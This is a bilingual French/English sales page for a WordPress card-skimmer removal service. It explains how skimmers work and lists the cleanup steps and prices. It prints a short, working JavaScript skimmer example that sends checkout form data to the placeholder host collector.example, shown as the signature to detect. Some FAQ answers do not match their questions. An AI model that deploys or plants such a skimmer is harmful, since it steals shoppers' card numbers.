Comment savoir si mon site WordPress est piraté ?

Presque toujours via une extension vulnérable ou un mot de passe admin volé. L’attaquant dépose un petit JavaScript sur la page de paiement qui copie silencieusement les numéros de carte au moment où le client les tape.

Mes clients sont-ils en sécurité maintenant que le skimmer est retiré ?

Going forward, yes. Cards entered while the skimmer was running need to be considered compromised. I include the timeline in my report so you can notify affected customers and your payment processor.

Dois-je donner mes identifiants admin ?

La plupart des règles des réseaux de cartes imposent de signaler un incident sur les données de carte. Notre rapport est rédigé pour être remis tel quel à votre acquéreur ou votre assureur, sans traduction supplémentaire.

Google fera-t-il à nouveau confiance à mon site ?

Souvent, oui. Nous soumettons une demande de réexamen Safe Browsing dans chaque nettoyage et redemandons l’indexation dans Search Console une fois le skimmer parti.

// PHARMA HACK · WORDPRESS · NETTOYÉ

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

Démarrer un nettoyage → Comment fonctionnent les skimmers

§ 01 — MÉCANISME

Quelques lignes de JavaScript suffisent à voler chaque commande.

Un skimmer de carte est un minuscule JavaScript qui écoute votre formulaire de paiement. Dès qu’un client saisit son numéro, le skimmer en fait une copie et l’envoie à une adresse contrôlée par l’attaquant — souvent un serveur d’apparence inoffensive.

La page fonctionne toujours. La commande passe toujours. Ni le client ni vous ne voyez rien d’anormal. Nous reproduisons la commande dans un bac à sable, traçons le script jusqu’à son emplacement réel sur votre site et le supprimons sans casser le reste du paiement.

// forme générique d’un skimmer de paiement

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

§ 02 — CE QUE NOUS SUPPRIMONS

Chaque endroit où cette infection se cache.

[ TRIAGE DES PLUGINS ]

Nous passons une commande de test en bac à sable et surveillons chaque appel réseau du checkout.
[ JAVASCRIPT ]

Fichiers de thème, ressources d’extensions et scripts inline examinés. Tout ce qui envoie des données de formulaire hors domaine — retiré.
[ BASE DE DONNÉES ]

Scripts injectés dans wp_options, wp_posts et widgets actifs — supprimés. La persistance est cassée.
[ SERVICES ]

Portes dérobées PHP qui réinstallent le skimmer traquées. Tâches cron et must-use plugins vérifiés.
[ CHRONOLOGIE ]

Dates de première et dernière observation établies pour savoir quelles commandes ont été exposées.
[ RAPPORT ]

Rapport forensique en clair, adapté aux clients, assureurs ou archives.

§ TARIFS

Forfait $279. Une seule fois. Par site.

[ RESCUE ]

$279

FORFAIT · UNIQUE · PAR SITE

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage →

[ SHIELD ]

$29 / mo

PAR SITE · RÉSILIATION À TOUT MOMENT

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contact →